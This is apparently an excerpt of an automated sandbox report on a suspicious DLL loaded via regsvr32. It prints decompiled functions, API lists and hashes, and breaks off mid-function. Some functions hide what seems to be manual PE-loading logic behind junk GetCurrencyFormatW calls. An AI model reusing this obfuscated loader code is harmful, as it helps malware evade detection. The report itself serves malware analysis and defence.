                                                                                                            0x10002f6a
                                                                                                            0x10002f6e
                                                                                                            0x10002f72
                                                                                                            0x10002f77
                                                                                                            0x10002fac
                                                                                                            0x10002fb0
                                                                                                            0x10002fb6
                                                                                                            0x10003011
                                                                                                            0x1000301c
                                                                                                            0x00000000
                                                                                                            0x1000301c
                                                                                                            0x10002fc2
                                                                                                            0x10002fc4
                                                                                                            0x00000000
                                                                                                            0x10002f79
                                                                                                            0x10002f83
                                                                                                            0x10002f85
                                                                                                            0x10002f96
                                                                                                            0x10002f98
                                                                                                            0x00000000
                                                                                                            0x10002f98
                                                                                                            0x10002f77
                                                                                                            0x00000000
                                                                                                            0x10002faa
                                                                                                            0x00000000
                                                                                                            0x10002ff4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C19
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C32
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C4F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C86
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002CA2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002FD5
                                                                                                            • IsBadHugeReadPtr.KERNEL32(000022B9,-00000014), ref: 10002FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$HugeRead
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 393575760-3161301136
                                                                                                            • Opcode ID: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
                                                                                                            • Instruction ID: ead797fee4320dd8a6b32923dbdec08024b9b474de8a2ec407594d38246e10a8
                                                                                                            • Opcode Fuzzy Hash: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
                                                                                                            • Instruction Fuzzy Hash: 15D15971508205AFE304DF60CD96F6BBBE8EB8A788F11581DF6459B292C732E914CF25
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001E51 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 314COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001E51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				int _t93;
				signed int _t94;
				signed int _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t147;
				short* _t160;
				signed int _t187;
				short* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t195 =  &_v20;
				_t194 = L"xadqsavcbdfewescGADW";
				_t160 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 =  *((intOrPtr*)(_a16 + 4));
				_v4 =  *(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a16 + 0x14) & 0x0000ffff;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc * 0x28 + _v4;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 + _v4 +  *_a16 + 0x18;
				_v8 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff) <= 0) {
					L11:
					return 1;
				}
				_v20 = _v4 + 0x10;
				do {
					_t93 = 0;
					if( *_v20 != 0) {
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _a8, _t94 *  *0x100440d0 +  *_v20 +  *((intOrPtr*)(_v20 + 4))) == 0) {
							L13:
							return 0;
						}
						_t108 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						_t109 = _v20;
						_t113 =  *((intOrPtr*)(_a16 + 0x1c))( *((intOrPtr*)(_t109 - 4)) + _v12, _t108 *  *0x100440d8 +  *_t109, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 4,  *((intOrPtr*)(_a16 + 0x34)));
						_t196 = _t195 + 0x14;
						if(_t113 == 0) {
							goto L13;
						}
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 +  *((intOrPtr*)(_v20 - 4)) + _v12;
						memcpy(_v16,  *((intOrPtr*)(_v20 + 4)) + _a4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc +  *_v20);
						_t195 = _t196 + 0xc;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 - 0x00000001 & _v16;
						 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4;
						L9:
						_t93 = 0;
						goto L10;
					}
					_t187 =  *((intOrPtr*)(_a12 + 0x38));
					_v4 = _t187;
					if(_t187 <= 0) {
						goto L10;
					}
					_t147 =  *((intOrPtr*)(_a16 + 0x1c))(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v20 - 4)) + _v12, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _v4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440dc + 4,  *((intOrPtr*)(_a16 + 0x34)));
					_t197 = _t195 + 0x14;
					if(_t147 == 0) {
						goto L13;
					}
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 - 4)) + _v12;
					 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 - 0x00000001 & _v16;
					memset(_v16, 0, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4);
					_t195 = _t197 + 0xc;
					goto L9;
					L10:
					_v8 = _v8 + 1;
					_v20 = _v20 + 0x28;
				} while (_v8 < GetCurrencyFormatW(_t93, 0x11d4, _t160, _t93, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff));
				goto L11;
			}




















                                                                                                            0x10001e51
                                                                                                            0x10001e6a
                                                                                                            0x10001e72
                                                                                                            0x10001e80
                                                                                                            0x10001eaa
                                                                                                            0x10001eca
                                                                                                            0x10001eeb
                                                                                                            0x10001ef5
                                                                                                            0x10001f10
                                                                                                            0x100021bf
                                                                                                            0x00000000
                                                                                                            0x100021c1
                                                                                                            0x10001f1d
                                                                                                            0x10001f21
                                                                                                            0x10001f25
                                                                                                            0x10001f29
                                                                                                            0x10002045
                                                                                                            0x1000207d
                                                                                                            0x100021ca
                                                                                                            0x00000000
                                                                                                            0x100021ca
                                                                                                            0x100020ca
                                                                                                            0x100020d5
                                                                                                            0x100020e8
                                                                                                            0x100020eb
                                                                                                            0x100020f0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002122
                                                                                                            0x10002144
                                                                                                            0x1000214a
                                                                                                            0x10002173
                                                                                                            0x10002188
                                                                                                            0x1000218b
                                                                                                            0x1000218b
                                                                                                            0x00000000
                                                                                                            0x1000218b
                                                                                                            0x10001f33
                                                                                                            0x10001f38
                                                                                                            0x10001f3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001fba
                                                                                                            0x10001fbd
                                                                                                            0x10001fc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001ff4
                                                                                                            0x10002016
                                                                                                            0x1000202d
                                                                                                            0x10002033
                                                                                                            0x00000000
                                                                                                            0x1000218d
                                                                                                            0x1000218d
                                                                                                            0x10002191
                                                                                                            0x100021b5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$memcpymemset
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 2888895459-2712681272
                                                                                                            • Opcode ID: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
                                                                                                            • Instruction ID: 346e2bfed80208adbbea8c92dee40ae63694b643ed2e5d5183bbf84c561662e4
                                                                                                            • Opcode Fuzzy Hash: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
                                                                                                            • Instruction Fuzzy Hash: B1A159B1644344BFE208DB95CD86F2BBBECEB8AB48F011419F745DB2D1C671E9108B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005EFE Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10005EFE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10045580; // 0x8f64cb61
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1001FBC4(E10032F92, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E100056C3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10021022( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10020F40(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100056D9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E10005789(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E100057BF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10005DB0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10005CE3(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1001FBB5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                            0x10005efe
                                                                                                            0x10005eff
                                                                                                            0x10005f05
                                                                                                            0x10005f09
                                                                                                            0x10005f10
                                                                                                            0x10005f16
                                                                                                            0x10005f1d
                                                                                                            0x10005f2e
                                                                                                            0x10005f35
                                                                                                            0x10005f38
                                                                                                            0x10005f3b
                                                                                                            0x10005f3e
                                                                                                            0x10005f4c
                                                                                                            0x10005f4f
                                                                                                            0x10005f53
                                                                                                            0x10006021
                                                                                                            0x100060dd
                                                                                                            0x100060e1
                                                                                                            0x100060f5
                                                                                                            0x100060f8
                                                                                                            0x10006102
                                                                                                            0x10006108
                                                                                                            0x10006120
                                                                                                            0x1000612c
                                                                                                            0x10006131
                                                                                                            0x10006134
                                                                                                            0x10006134
                                                                                                            0x10006102
                                                                                                            0x10006027
                                                                                                            0x1000603b
                                                                                                            0x10006046
                                                                                                            0x1000605c
                                                                                                            0x1000606b
                                                                                                            0x10006083
                                                                                                            0x10006088
                                                                                                            0x1000608e
                                                                                                            0x1000609a
                                                                                                            0x1000609d
                                                                                                            0x100060af
                                                                                                            0x100060bb
                                                                                                            0x100060c0
                                                                                                            0x100060c3
                                                                                                            0x100060c3
                                                                                                            0x1000608e
                                                                                                            0x100060cd
                                                                                                            0x100060cd
                                                                                                            0x10006046
                                                                                                            0x10005f59
                                                                                                            0x10005f61
                                                                                                            0x10005f64
                                                                                                            0x10005f67
                                                                                                            0x10005f79
                                                                                                            0x10005f82
                                                                                                            0x10005f8a
                                                                                                            0x10005f97
                                                                                                            0x10005f9a
                                                                                                            0x10005fa1
                                                                                                            0x10005fa5
                                                                                                            0x10005fa9
                                                                                                            0x10005fac
                                                                                                            0x10005faf
                                                                                                            0x10005fbc
                                                                                                            0x10005fc8
                                                                                                            0x10005fcd
                                                                                                            0x10005fd0
                                                                                                            0x10005fd0
                                                                                                            0x10005fd7
                                                                                                            0x10005fd7
                                                                                                            0x10005fdc
                                                                                                            0x10005fdf
                                                                                                            0x10005ff6
                                                                                                            0x10005ffd
                                                                                                            0x1000600c
                                                                                                            0x10006142
                                                                                                            0x10006149
                                                                                                            0x10006159
                                                                                                            0x1000615c
                                                                                                            0x1000615f
                                                                                                            0x10006166
                                                                                                            0x10006169
                                                                                                            0x10006170
                                                                                                            0x1000617c
                                                                                                            0x10006186
                                                                                                            0x1000618b
                                                                                                            0x1000618b
                                                                                                            0x10006190
                                                                                                            0x10006195
                                                                                                            0x100061b2
                                                                                                            0x100061b2
                                                                                                            0x100061b9
                                                                                                            0x100061be
                                                                                                            0x00000000
                                                                                                            0x10006197
                                                                                                            0x10006197
                                                                                                            0x1000619e
                                                                                                            0x100061a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100061a8
                                                                                                            0x100061ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100061ae
                                                                                                            0x100061b0
                                                                                                            0x00000000
                                                                                                            0x100061b0
                                                                                                            0x10006012
                                                                                                            0x10006012
                                                                                                            0x100061c0
                                                                                                            0x100061c3
                                                                                                            0x100061cb
                                                                                                            0x100061cc
                                                                                                            0x100061cd
                                                                                                            0x100061e2
                                                                                                            0x100061e2

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10005F1D
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
                                                                                                            • GetVersion.KERNEL32 ref: 10006019
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000603E
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10006063
                                                                                                            • _sscanf.LIBCMT ref: 10006083
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100060B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(76D84EE0), ref: 100060BE
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100060CD
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100060DD
                                                                                                            • EnumResourceLanguagesA.KERNEL32 ref: 100060F8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10006129
                                                                                                            • ConvertDefaultLocale.KERNEL32(76D84EE0), ref: 1000612F
                                                                                                            • _memset.LIBCMT ref: 10006149
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 434808117-483790700
                                                                                                            • Opcode ID: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
                                                                                                            • Instruction ID: 371a1abfdbbeaae06af34074570e4e6b8653269969333db2bd091179cc2368d9
                                                                                                            • Opcode Fuzzy Hash: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
                                                                                                            • Instruction Fuzzy Hash: 22818FB5D002299FEB11DFA5DC84AFFBAF5EB48351F20452AE944E7280D7789A44CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002482 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 327COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10002482(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				signed int _t117;
				signed int _t125;
				signed int _t150;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				short* _t178;
				short* _t222;
				void* _t223;

				_t223 =  &_v40;
				_t178 = L"xadqsavcbdfewescGADW";
				_t222 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v24 =  *(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a4 + 0x14) & 0x0000ffff;
				_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v24;
				_v40 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v24 +  *_a4 + 0x18;
				if(( *0x10046ab4 & 0x00000001) == 0) {
					 *0x10046ab4 =  *0x10046ab4 | 0x00000001;
					 *0x10046ab0 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0;
				}
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 +  *0x10046ab0 |  *(_v40 + 8);
				_v16 = E10001DB6(_v20, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_a4 + 0x3c)));
				_v24 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x28 + _v40);
				_t117 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
				_v40 = _v40 + 0x28;
				_v8 =  *(_v40 + 0x24);
				_v12 = _v24 + _t117 *  *0x100440d8;
				_v4 = 0;
				_v32 = 1;
				if(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff) <= 1) {
					L13:
					_v4 = 1;
					_t125 = E1000227A( &_v20, _a4);
					asm("sbb eax, eax");
					return  ~( ~_t125);
				} else {
					do {
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 +  *(_v40 + 8);
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24;
						_v36 = E10001DB6(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24,  *((intOrPtr*)(_a4 + 0x3c)));
						_v28 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v40);
						_v28 = _v28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0;
						if(_v16 == _v36 || _v12 + _v20 > GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v36) {
							if(( *(_v40 + 0x24) & GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
								L10:
								_t150 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 - 0x02000001 & ( *(_v40 + 0x24) | _v8);
								L11:
								_v8 = _t150;
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 - _v20 + _v28 + _v24;
								goto L12;
							}
							_t159 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
							_t160 = _v8;
							if((_t160 & _t159 *  *0x100440e0 + 0x02000000) == 0) {
								goto L10;
							}
							_t150 = _t160 |  *(_v40 + 0x24);
							goto L11;
						} else {
							if(E1000227A(_t223 + 0x28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x14, _a4) == 0) {
								return 0;
							}
							_v20 = _v24;
							_v16 = _v36;
							_t171 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t178 = L"xadqsavcbdfewescGADW";
							_v12 = _t171 *  *0x100440e0 + _v28;
							_v8 =  *(_v40 + 0x24);
						}
						L12:
